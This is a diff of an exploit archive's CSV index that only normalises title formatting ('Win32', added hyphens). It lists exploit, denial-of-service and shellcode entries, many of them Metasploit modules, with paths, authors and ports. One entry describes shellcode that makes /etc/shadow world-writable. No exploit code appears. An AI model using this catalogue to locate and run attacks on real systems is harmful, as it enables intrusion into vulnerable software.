Overflow",2010-11-14,metasploit,windows,remote,0 @@ -14498,7 +14498,7 @@ id,file,description,date,author,platform,type,port 16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 16729,platforms/windows/remote/16729.rb,"SlimFTPd LIST Concatenation Overflow",2010-10-05,metasploit,windows,remote,0 16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Username Overflow",2010-09-20,metasploit,windows,remote,0 -16731,platforms/win32/remote/16731.rb,"Oracle 9i XDB FTP PASS Overflow (win32)",2010-04-30,metasploit,win32,remote,0 +16731,platforms/win32/remote/16731.rb,"Oracle 9i XDB FTP PASS Overflow (Win32)",2010-04-30,metasploit,win32,remote,0 16732,platforms/windows/remote/16732.rb,"HTTPDX tolog() Function Format String Vulnerability",2010-08-25,metasploit,windows,remote,0 16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version",2010-04-30,metasploit,windows,remote,21 16734,platforms/windows/remote/16734.rb,"EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow",2010-08-03,metasploit,windows,remote,0 @@ -14518,7 +14518,7 @@ id,file,description,date,author,platform,type,port 16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)",2010-07-25,metasploit,windows,remote,0 16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface Overflow",2011-01-11,metasploit,windows,remote,0 16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service DNS Name Path Overflow",2010-07-25,metasploit,windows,remote,0 -16751,platforms/win32/remote/16751.rb,"SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow",2010-04-30,metasploit,win32,remote,0 +16751,platforms/win32/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 File Request Format String Overflow",2010-04-30,metasploit,win32,remote,0 16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite LDAP protocol Buffer Overflow",2010-02-15,metasploit,windows,remote,80 16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server If-Modified-Since Overflow",2010-08-25,metasploit,windows,remote,80 16754,platforms/windows/remote/16754.rb,"Minishare 1.4.1 - Buffer Overflow",2010-05-09,metasploit,windows,remote,80 @@ -14526,11 +14526,11 @@ id,file,description,date,author,platform,type,port 16756,platforms/windows/remote/16756.rb,"Sambar 6 - Search Results Buffer Overflow",2010-02-13,metasploit,windows,remote,80 16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,metasploit,windows,remote,8300 16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,metasploit,windows,remote,9999 -16759,platforms/win32/remote/16759.rb,"SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)",2010-05-09,metasploit,win32,remote,0 +16759,platforms/win32/remote/16759.rb,"SHTTPD <= 1.34 URI-Encoded POST Request Overflow (Win32)",2010-05-09,metasploit,win32,remote,0 16760,platforms/windows/remote/16760.rb,"Private Wire Gateway Buffer Overflow",2010-04-30,metasploit,windows,remote,80 16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 EXT.dll Buffer Overflow",2010-07-07,metasploit,windows,remote,80 16762,platforms/windows/remote/16762.rb,"BEA WebLogic JSESSIONID Cookie Value Overflow",2010-07-03,metasploit,windows,remote,80 -16763,platforms/win32/remote/16763.rb,"Icecast <= 2.0.1 - Header Overwrite (win32)",2010-04-30,metasploit,win32,remote,8000 +16763,platforms/win32/remote/16763.rb,"Icecast <= 2.0.1 - Header Overwrite (Win32)",2010-04-30,metasploit,win32,remote,8000 16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM Database Parameter Overflow",2010-09-20,metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,8080 @@ -14553,8 +14553,8 @@ id,file,description,date,author,platform,type,port 16783,platforms/win32/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot Overflow",2010-09-20,metasploit,win32,remote,0 16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management Remote Execution",2010-11-22,metasploit,multiple,remote,80 16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration Buffer Overflow",2010-11-24,metasploit,windows,remote,80 -16786,platforms/windows/remote/16786.rb,"PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)",2010-09-20,metasploit,windows,remote,7144 -16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 Buffer Overflow",2010-07-14,metasploit,windows,remote,0 +16786,platforms/windows/remote/16786.rb,"PeerCast <= 0.1216 URL Handling Buffer Overflow (Win32)",2010-09-20,metasploit,windows,remote,7144 +16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,metasploit,windows,remote,0 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execute",2010-11-24,metasploit,cfm,webapps,0 16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 Arbitrary File Upload and Execute",2010-11-24,metasploit,multiple,remote,8080 16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow",2010-05-09,metasploit,windows,dos,8080 @@ -14565,7 +14565,7 @@ id,file,description,date,author,platform,type,port 16795,platforms/cgi/webapps/16795.rb,"HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow",2010-05-09,metasploit,cgi,webapps,0 16796,platforms/windows/remote/16796.rb,"BEA Weblogic Transfer-Encoding Buffer Overflow",2010-07-08,metasploit,windows,remote,80 16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16798,platforms/windows/remote/16798.rb,"Apache mod_jk 1.2.20 Buffer Overflow",2010-07-25,metasploit,windows,remote,0 +16798,platforms/windows/remote/16798.rb,"Apache mod_jk 1.2.20 - Buffer Overflow",2010-07-25,metasploit,windows,remote,0 16799,platforms/windows/remote/16799.rb,"HTTPDX h_handlepeer() Function Buffer Overflow",2010-07-26,metasploit,windows,remote,0 16800,platforms/windows/remote/16800.rb,"Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow",2010-06-11,metasploit,windows,remote,8000 16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway Debug Mode Buffer Overflow",2010-04-30,metasploit,windows,remote,5250 @@ -14576,7 +14576,7 @@ id,file,description,date,author,platform,type,port 16806,platforms/windows/remote/16806.rb,"BadBlue 2.72b PassThru Buffer Overflow",2010-07-08,metasploit,windows,remote,0 16807,platforms/windows/remote/16807.rb,"InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow",2010-07-12,metasploit,windows,remote,57772 16808,platforms/windows/remote/16808.rb,"NaviCOPA 2.0.1 URL Handling Buffer Overflow",2010-07-12,metasploit,windows,remote,80 -16809,platforms/win32/remote/16809.rb,"Oracle 9i XDB HTTP PASS Overflow (win32)",2010-09-20,metasploit,win32,remote,8080 +16809,platforms/win32/remote/16809.rb,"Oracle 9i XDB HTTP PASS Overflow (Win32)",2010-09-20,metasploit,win32,remote,8080 16810,platforms/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow",2010-09-20,metasploit,windows,remote,443 16811,platforms/windows/webapps/16811.rb,"TrackerCam PHP Argument Buffer Overflow",2010-05-09,metasploit,windows,webapps,8090 16812,platforms/windows/remote/16812.rb,"MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow",2010-07-01,metasploit,windows,remote,3000 @@ -14588,13 +14588,13 @@ id,file,description,date,author,platform,type,port 16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow",2010-05-09,metasploit,windows,remote,25 16819,platforms/windows/remote/16819.rb,"SoftiaCom WMailserver 1.0 - Buffer Overflow",2010-05-09,metasploit,windows,remote,25 16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,metasploit,windows,remote,25 -16821,platforms/windows/remote/16821.rb,"Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow",2010-06-22,metasploit,windows,remote,25 +16821,platforms/windows/remote/16821.rb,"Mercury Mail SMTP AUTH CRAM-MD5 - Buffer Overflow",2010-06-22,metasploit,windows,remote,25 16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow",2010-04-30,metasploit,windows,remote,25 16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 LDAP Buffer Overflow",2010-11-14,metasploit,windows,remote,389 16824,platforms/windows/remote/16824.rb,"IMail LDAP Service Buffer Overflow",2010-04-30,metasploit,windows,remote,389 16825,platforms/windows/remote/16825.rb,"CA CAM log_security() Stack Buffer Overflow (Win32)",2010-09-20,metasploit,windows,remote,0 16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service Buffer Overflow",2010-05-13,metasploit,windows,remote,38292 -16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 +16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16829,platforms/windows/remote/16829.rb,"Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16830,platforms/windows/remote/16830.rb,"Symantec Remote Management Buffer Overflow",2010-05-09,metasploit,windows,remote,0 @@ -14632,7 +14632,7 @@ id,file,description,date,author,platform,type,port 16862,platforms/hardware/remote/16862.rb,"iPhone MobileSafari LibTIFF Buffer Overflow",2010-09-20,metasploit,hardware,remote,0 16863,platforms/osx/remote/16863.rb,"AppleFileServer LoginExt PathName Overflow",2010-09-20,metasploit,osx,remote,0 16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client Buffer Overflow Exploit",2010-10-09,metasploit,osx,remote,0 -16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 Overflow (Mac OS X)",2010-05-09,metasploit,osx,remote,0 +16865,platforms/osx/remote/16865.rb,"Arkeia Backup Client Type 77 - Overflow (Mac OS X)",2010-05-09,metasploit,osx,remote,0 16866,platforms/unix/remote/16866.rb,"Safari Archive Metadata Command Execution",2010-09-20,metasploit,unix,remote,0 16867,platforms/osx/remote/16867.rb,"Apple OS X Software Update Command Execution",2010-09-20,metasploit,osx,remote,0 16868,platforms/hardware/remote/16868.rb,"iPhone MobileSafari LibTIFF Buffer Overflow",2010-09-20,metasploit,hardware,remote,0 @@ -14680,7 +14680,7 @@ id,file,description,date,author,platform,type,port 16913,platforms/php/webapps/16913.rb,"PhpMyAdmin Config File Code Injection",2010-07-03,metasploit,php,webapps,0 16914,platforms/cgi/webapps/16914.rb,"Matt Wright guestbook.pl Arbitrary Command Execution",2010-07-03,metasploit,cgi,webapps,0 16915,platforms/linux/remote/16915.rb,"Oracle VM Server Virtual Server Agent Command Injection",2010-10-25,metasploit,linux,remote,0 -16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway Command Execution",2011-03-03,metasploit,linux,remote,0 +16916,platforms/linux/remote/16916.rb,"Citrix Access Gateway - Command Execution",2011-03-03,metasploit,linux,remote,0 16917,platforms/php/webapps/16917.rb,"Dogfood CRM spell.php Remote Command Execution",2010-07-03,metasploit,php,webapps,0 16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent net.tcp.listen Command Injection",2010-07-03,metasploit,freebsd,remote,0 16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,metasploit,linux,remote,0 @@ -14693,7 +14693,7 @@ id,file,description,date,author,platform,type,port 16926,platforms/windows/remote/16926.rb,"Mercantec SoftCart CGI Overflow",2010-09-20,metasploit,windows,remote,0 16927,platforms/hp-ux/remote/16927.rb,"HP-UX LPD Command Execution",2010-10-06,metasploit,hp-ux,remote,0 16928,platforms/linux/remote/16928.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow",2010-07-03,metasploit,linux,remote,0 -16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow",2010-11-11,metasploit,aix,dos,0 +16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow",2010-11-11,metasploit,aix,dos,0 16930,platforms/aix/remote/16930.rb,"ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",2010-11-11,metasploit,aix,remote,0 16931,platforms/php/webapps/16931.html,"N-13 News 4.0 - CSRF Vulnerability (Add Admin)",2011-03-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 16933,platforms/php/webapps/16933.txt,"Quick Polls Local File Inclusion and Deletion Vulnerabilities",2011-03-06,"Mark Stanislav",php,webapps,0 @@ -14719,7 +14719,7 @@ id,file,description,date,author,platform,type,port 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer Multiple SQL Injection Vulnerabilities",2011-03-10,p0pc0rn,asp,webapps,0 16954,platforms/php/webapps/16954.txt,"Keynect Ecommerce SQL Injection Vulnerability",2011-03-10,"Arturo Zamora",php,webapps,0 16955,platforms/asp/webapps/16955.txt,"smartermail 7.3 & 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 -16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow",2011-03-07,metasploit,windows,remote,0 +16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control <= 5.52 - Buffer Overflow",2011-03-07,metasploit,windows,remote,0 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows Payload Execution",2011-03-08,metasploit,windows,remote,0 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow Vulnerability",2011-03-11,mr_me,linux,dos,0 @@ -14818,7 +14818,7 @@ id,file,description,date,author,platform,type,port 17064,platforms/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local SEH Buffer Overflow Exploit",2011-03-29,Dr_IDE,windows,local,0 17068,platforms/multiple/remote/17068.py,"jHTTPd 0.1a - Directory Traversal Vulnerability",2011-03-29,"AutoSec Tools",multiple,remote,0 17069,platforms/php/webapps/17069.txt,"oscss2 2.1.0 rc12 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 -17070,platforms/windows/dos/17070.py,"Rumble 0.25.2232 Denial of Service Vulnerability",2011-03-29,"AutoSec Tools",windows,dos,0 +17070,platforms/windows/dos/17070.py,"Rumble 0.25.2232 - Denial of Service Vulnerability",2011-03-29,"AutoSec Tools",windows,dos,0 17071,platforms/windows/dos/17071.py,"GOM Player 2.1.28.5039 - AVI DoS PoC",2011-03-29,BraniX,windows,dos,0 17072,platforms/windows/dos/17072.py,"Windows Explorer 6.0.2900.5512 (Shmedia.dll 6.0.2900.5512) AVI Preview DoS PoC",2011-03-29,BraniX,windows,dos,0 17074,platforms/windows/dos/17074.py,"Winamp 5.61 - AVI DoS PoC",2011-03-29,BraniX,windows,dos,0 @@ -14855,12 +14855,12 @@ id,file,description,date,author,platform,type,port 17108,platforms/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusion Vulnerabilities",2011-04-03,KedAns-Dz,php,webapps,0 17110,platforms/php/webapps/17110.txt,"DoceboLms 4.0.4 - Multiple Stored XSS Vulnerabilities",2011-04-04,LiquidWorm,php,webapps,0 17111,platforms/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) Stored and Reflective XSS Vulnerabilities",2011-04-04,"Michael Brooks",multiple,webapps,0 -17112,platforms/hardware/webapps/17112.txt,"Encore ENPS-2012 Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 +17112,platforms/hardware/webapps/17112.txt,"Encore ENPS-2012 - Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 17113,platforms/hardware/webapps/17113.txt,"TP-Link TL-PS110U & TL-PS110P Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 17114,platforms/hardware/webapps/17114.txt,"Planex Mini-300PU & Mini100s Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 17115,platforms/hardware/webapps/17115.txt,"ZO Tech Multiple Print Servers Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 17116,platforms/hardware/webapps/17116.txt,"Longshine Multiple Print Servers Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 -17117,platforms/hardware/webapps/17117.txt,"Planet FPS-1101 Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 +17117,platforms/hardware/webapps/17117.txt,"Planet FPS-1101 - Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 17118,platforms/php/webapps/17118.txt,"OpenEMR 4.0.0 - Multiple Vulnerabilities",2011-04-05,"AutoSec Tools",php,webapps,0 17119,platforms/php/webapps/17119.txt,"Wordpress Plugin Custom Pages 0.5.0.1 - LFI Vulnerability",2011-04-05,"AutoSec Tools",php,webapps,0 17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Function Stack Corruption Vulnerability",2011-02-25,"Simon Berry-Byrne",multiple,dos,0 @@ -15105,13 +15105,13 @@ id,file,description,date,author,platform,type,port 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,metasploit,windows,remote,0 17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 Pre-Auth Local File Inclusion Exploit",2011-06-20,TecR0c,php,webapps,0 17419,platforms/windows/remote/17419.zip,"Mozilla Firefox ""nsTreeRange"" Dangling Pointer Exploit",2011-06-20,Abysssec,windows,remote,0 -17421,platforms/windows/dos/17421.py,"XnView 1.98 Denial of Service Vulnerability PoC",2011-06-20,BraniX,windows,dos,0 +17421,platforms/windows/dos/17421.py,"XnView 1.98 - Denial of Service Vulnerability PoC",2011-06-20,BraniX,windows,dos,0 17422,platforms/hardware/remote/17422.txt,"DreamBox DM800 Arbitrary File Download Vulnerability",2011-06-21,ShellVision,hardware,remote,0 17423,platforms/php/webapps/17423.txt,"WPtouch WordPress Plugin 1.9.27 URL redirection",2011-06-21,MaKyOtOx,php,webapps,0 17424,platforms/windows/remote/17424.rb,"Black Ice Cover Page ActiveX Control Arbitrary File Download",2011-06-21,metasploit,windows,remote,0 17426,platforms/php/webapps/17426.txt,"iGiveTest 2.1.0 - SQL Injection Vulnerability",2011-06-21,"Brendan Coles",php,webapps,0 17428,platforms/php/webapps/17428.txt,"Cachelogic Expired Domains Script 1.0 - Multiple Vulnerabilities",2011-06-22,"Brendan Coles",php,webapps,0 -17429,platforms/windows/remote/17429.rb,"FactoryLink vrn.exe Opcode 9 Buffer Overflow",2011-06-21,metasploit,windows,remote,0 +17429,platforms/windows/remote/17429.rb,"FactoryLink vrn.exe - Opcode 9 Buffer Overflow",2011-06-21,metasploit,windows,remote,0 17430,platforms/windows/remote/17430.rb,"Sielco Sistemi Winlog Buffer Overflow",2011-06-21,metasploit,windows,remote,0 17431,platforms/php/webapps/17431.txt,"Same Team E-shop manager - SQL Injection Exploit",2011-06-22,"Number 7",php,webapps,0 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH - sh4 - setuid(0) - chmod(""/etc/shadow"", 0666) - exit(0) - 43 bytes",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 @@ -15134,7 +15134,7 @@ id,file,description,date,author,platform,type,port 17452,platforms/php/webapps/17452.txt,"JoomlaXi Persistent XSS Vulnerability",2011-06-26,"Karthik R",php,webapps,0 17453,platforms/php/webapps/17453.txt,"Wordpress Beer Recipes Plugin 1.0 - XSS",2011-06-26,TheUzuki.',php,webapps,0 17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server Denial of Service Vulnerability",2011-06-27,"Myo Soe",windows,dos,0 -17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow",2011-06-27,metasploit,windows,remote,0 +17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow",2011-06-27,metasploit,windows,remote,0 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 - SQL Injection Vulnerability",2011-06-28,hamt0ry,php,webapps,0 17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Local Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0 @@ -15145,7 +15145,7 @@ id,file,description,date,author,platform,type,port 17464,platforms/php/webapps/17464.txt,"Joomla mdigg Component SQL Injection Vulnerability",2011-07-01,"Caddy Dz",php,webapps,0 17465,platforms/php/webapps/17465.txt,"WordPress 3.1.3 - SQL Injection Vulnerabilities",2011-07-01,"SEC Consult",php,webapps,0 17466,platforms/php/webapps/17466.txt,"Ollance Member Login Script Multiple Vulnerabilities",2011-07-01,"$#4d0\/\/[r007k17]",php,webapps,0 -17467,platforms/windows/remote/17467.rb,"HP OmniInet.exe Opcode 27 Buffer Overflow",2011-07-01,metasploit,windows,remote,5555 +17467,platforms/windows/remote/17467.rb,"HP OmniInet.exe - Opcode 27 Buffer Overflow",2011-07-01,metasploit,windows,remote,5555 17468,platforms/windows/remote/17468.py,"HP Data Protector 6.11 - Remote Buffer Overflow + DEP Bypass",2011-07-02,"muts and dookie",windows,remote,5555 17471,platforms/windows/dos/17471.py,"Donar Player 2.8.0 - Denial of Service Vulnerability",2011-07-03,X-h4ck,windows,dos,0 17472,platforms/asp/webapps/17472.txt,"DmxReady Catalog Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0 @@ -15166,7 +15166,7 @@ id,file,description,date,author,platform,type,port 17487,platforms/php/webapps/17487.php,"WeBid <= 1.0.2 (converter.php) Remote Code Execution Exploit",2011-07-04,EgiX,php,webapps,0 17488,platforms/windows/local/17488.txt,"Adobe Reader 5.1 XFDF Buffer Overflow Vulnerability (SEH)",2011-07-04,extraexploit,windows,local,0 17489,platforms/windows/local/17489.rb,"Word List Builder 1.0 - Buffer Overflow Exploit (MSF)",2011-07-04,"James Fitts",windows,local,0 -17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 Buffer Overflow",2011-07-04,metasploit,windows,remote,0 +17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Buffer Overflow",2011-07-04,metasploit,windows,remote,0 17491,platforms/unix/remote/17491.rb,"VSFTPD 2.3.4 - Backdoor Command Execution",2011-07-05,metasploit,unix,remote,0 17492,platforms/windows/local/17492.rb,"Wordtrainer 3.0 - (.ord) Buffer Overflow Vulnerability (MSF)",2011-07-05,"James Fitts",windows,local,0 17493,platforms/asp/webapps/17493.txt,"DmxReady Secure Document Library 1.2 - SQL Injection Vulnerability",2011-07-05,Bellatrix,asp,webapps,0 @@ -15185,7 +15185,7 @@ id,file,description,date,author,platform,type,port 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0 17512,platforms/windows/dos/17512.pl,"ZipItFast 3.0 - (.ZIP) Heap Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0 -17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow",2011-07-09,metasploit,windows,remote,0 +17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow",2011-07-09,metasploit,windows,remote,0 17514,platforms/php/webapps/17514.php,"phpMyAdmin 3.x Swekey Remote Code Injection Exploit",2011-07-09,Mango,php,webapps,0 17515,platforms/php/webapps/17515.txt,"Portix-CMS 1.5.0. rc5 - Local File Inclusion Vulnerability",2011-07-09,Or4nG.M4N,php,webapps,0 17517,platforms/windows/remote/17517.txt,"Symantec Backup Exec 12.5 MiTM Attack",2011-07-09,Nibin,windows,remote,0 @@ -15241,8 +15241,8 @@ id,file,description,date,author,platform,type,port 17579,platforms/php/webapps/17579.rb,"Joomla 1.5 com_virtuemart <= 1.1.7 - Blind time-based SQL Injection (MSF)",2011-07-28,TecR0c,php,webapps,0 17580,platforms/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,windows,dos,0 17581,platforms/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,windows,remote,0 -17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop Stack-Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0 -17583,platforms/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service Heap Corruption",2011-07-28,"n.runs AG",windows,dos,0 +17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack-Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0 +17583,platforms/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service - Heap Corruption",2011-07-28,"n.runs AG",windows,dos,0 17584,platforms/php/webapps/17584.php,"cFTP <= 0.1 (r80) Arbitrary File Upload",2011-07-29,leviathan,php,webapps,0 17586,platforms/jsp/webapps/17586.txt,"ManageEngine ServiceDesk Plus 8.0 Build 8013 - Multiple XSS Vulnerabilities",2011-07-29,"Narendra Shinde",jsp,webapps,0 17587,platforms/php/webapps/17587.txt,"Link Station Pro Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0 @@ -15300,7 +15300,7 @@ id,file,description,date,author,platform,type,port 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0 17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0 -17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 Denial of Servive Exploit",2011-08-12,G13,windows,dos,0 +17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive Exploit",2011-08-12,G13,windows,dos,0 17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,metasploit,windows,remote,0 17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection Vulnerability",2011-08-13,seceurityoverun,php,webapps,0 17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0 @@ -15375,7 +15375,7 @@ id,file,description,date,author,platform,type,port 17739,platforms/php/webapps/17739.txt,"WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 17740,platforms/php/webapps/17740.txt,"WordPress mySTAT plugin <= 2.6 - SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 17741,platforms/php/webapps/17741.txt,"Omnistar Mailer Multiple Vulnerabilities",2011-08-28,Sid3^effects,php,webapps,0 -17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0 +17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0 17743,platforms/php/webapps/17743.rb,"LifeSize Room Command Injection",2011-08-28,"Spencer McIntyre",php,webapps,0 17744,platforms/windows/local/17744.pl,"Mini-stream Ripper 2.9.7.273 - (.m3u) Universal BoF",2011-08-29,"D3r K0n!G",windows,local,0 17745,platforms/windows/local/17745.pl,"DVD X Player 5.5 Professional (.plf) Universal Buffer Overflow",2011-08-29,"D3r K0n!G",windows,local,0 @@ -15393,7 +15393,7 @@ id,file,description,date,author,platform,type,port 17759,platforms/php/webapps/17759.txt,"WordPress Couponer plugin <= 1.2 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17760,platforms/php/webapps/17760.txt,"Wordpress grapefile plugin <= 1.1 - Arbitrary File Upload",2011-08-31,"Hrvoje Spoljar",php,webapps,0 17761,platforms/php/webapps/17761.txt,"wordpress image gallery with slideshow plugin <= 1.5 - Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",php,webapps,0 -17762,platforms/windows/remote/17762.rb,"Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability",2011-08-31,metasploit,windows,remote,0 